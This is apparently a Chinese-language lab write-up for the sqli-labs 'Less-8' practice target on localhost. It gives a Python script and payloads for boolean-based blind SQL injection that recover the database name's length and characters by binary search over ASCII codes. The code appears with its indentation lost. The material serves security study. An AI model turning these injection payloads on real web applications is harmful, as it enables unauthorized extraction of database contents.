目录
import requests
import math
url = "http://127.0.0.1/Less-8"
def dblength():
for i in range(20):
payload = f"1' and length(database())>{i}-- "
data = {'id': payload}
res = requests.get(url, params=data)
if 'You are in...........' not in res.text:
return i
def dbname():
dbname = ''
length = dblength()
for i in range(1, length + 1):
low = 32
high = 126
flag = 0
while low <= high:
mid = (low + high) // 2
payload = f"1' and ascii(substr(database(),{i},1))>{mid}-- "
data = {'id': payload}
res = requests.get(url, params=data)
if 'You are in...........' in res.text:
low = mid
else:
high = mid
if mid == flag:
dbname += chr(math.floor(mid + 1))
break
flag = mid
print(dbname)
return dbname
print('dbname is', dbname())
判断库名
1.库名长度
当大于一个不存在的长度的时候,就不会回显:
但是这个长度存在的话,会返回一个"You are in.........":
所以payload是1' and length(database())>{i}--+
def length():
for i in range(20):
payload = f"1' and length(database())>{i}-- "
data = {'id': payload}
res = requests.get(url, params=data)
if 'You are in...........' not in res.text:
return i
2.库名
长度已经得出来了,然后就一个字符一个字符的判断是什么:
payload:1' and ascii(substr(database(),1,1))>33--+
1.用ascll码对应字母数字,且范围是32-126
2.当没有返回值的时候就说明等于而不是大于,就得出值了。
3.加上二分法判断,比直接遍历要快
